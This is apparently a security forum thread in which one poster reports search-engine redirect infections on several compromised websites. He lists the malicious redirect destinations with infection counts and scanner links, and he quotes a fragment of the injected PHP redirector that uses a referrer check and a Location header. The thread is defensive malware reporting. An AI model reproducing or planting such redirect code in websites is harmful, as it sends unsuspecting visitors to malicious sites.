SE visitor redirect detected?

Viruses and worms
1

See: http://killmalware.com/creoquealgoestapasando.com/#
SE visitors redirects
Visitors from search engines are redirected
to: htxp://cooptraiss.com/hezd.html?h=989550
95 sites infected with redirects to this URL
https://www.virustotal.com/nl/file/5a96ae11555504787da4b5f09ca3175a006392cff7c2c7df1a57f08ca2ebda02/analysis/ &
https://www.virustotal.com/nl/url/eeddf36ddf40e395ac70e5a5ffa404acc93024adbd920591b7a756b7147ad0ac/analysis/
http://sitecheck.sucuri.net/results/cooptraiss.com/

polonus

2

SE visitor redirect campaigns may be short-lived (couple of hours) or may be up and active for longer until finally being taken down or dead.
On for a couple of days is http://killmalware.com/g-010.com/# → SE visitors redirects
Visitors from search engines are redirected
to: htxp://korawi.4pu.com/
1016 sites infected with redirects to this URL
See: http://fetch.scritch.org/%2Bfetch/?url=http%3A%2F%2Fwww.g-010.com%2F%2Findex.php&useragent=Fetch+useragent&accept_encoding=
PHP attack → tristr($referer,“facebook.com”) or stristr($referer,“aol dot com”)) { if (!stristr($referer,“cache”) or !stristr($referer,“inurl”)){ header(“Location: htxp://korawi.4pu.com/”); …PHP 5.2.17p1 40%
see: http://www.urlvoid.com/scan/korawi.4pu.com/
See the redirecting site is not being blocked at the moment,
also see: http://sitecheck.sucuri.net/results/www.g-010.com/
which flags the malware as:
Suspicious domain detected. Details: http://sucuri.net/malware/malware-entry-mwblacklisted35
Location: htxp://korawi.4pu.com/ where avast! Web Shield should have detected PHP:Redirector-AF[Trj]

polonus

3

What about this one? http://killmalware.com/savvyvisions.com/#
SE visitors redirects
Visitors from search engines are redirected
to: htxp://rnd.jkub.com/ → http://labs.sucuri.net/?details=rnd.jkub.com
& http://www.urlvoid.com/scan/rnd.jkub.com (some give nd.jkub dot com as currently safe)
1595 sites infected with redirects to this URL

pol

4

Three scanners do not detect: http://urlquery.net/report.php?id=1403999288431
and http://zulu.zscaler.com/submission/show/20a30cb46b768a7af25aa2f073a2d34b-1403999238
and http://www.quttera.com/detailed_report/agroforestryinc.com
SE visitors redirects
Chain of redirects found:
to: htxp://tinyurl.com/bnrs6vp
1351 sites infected with redirects to this URL
to: htxp://www.mangacompass.altervista.org/libraries/pear/tard/www/all2.php
6987 sites infected with redirects to this URL
Being confirmed here: http://sitecheck.sucuri.net/results/agroforestryinc.com

pol

P.S. Joomla is involved. The folks at that website may have missed the info on our forums on April 9 last, ;D,
so they are confronted with the same or a reinfection two months later.
Read on this an earlier posting of mine, here: https://forum.avast.com/index.php?topic=148758.0

D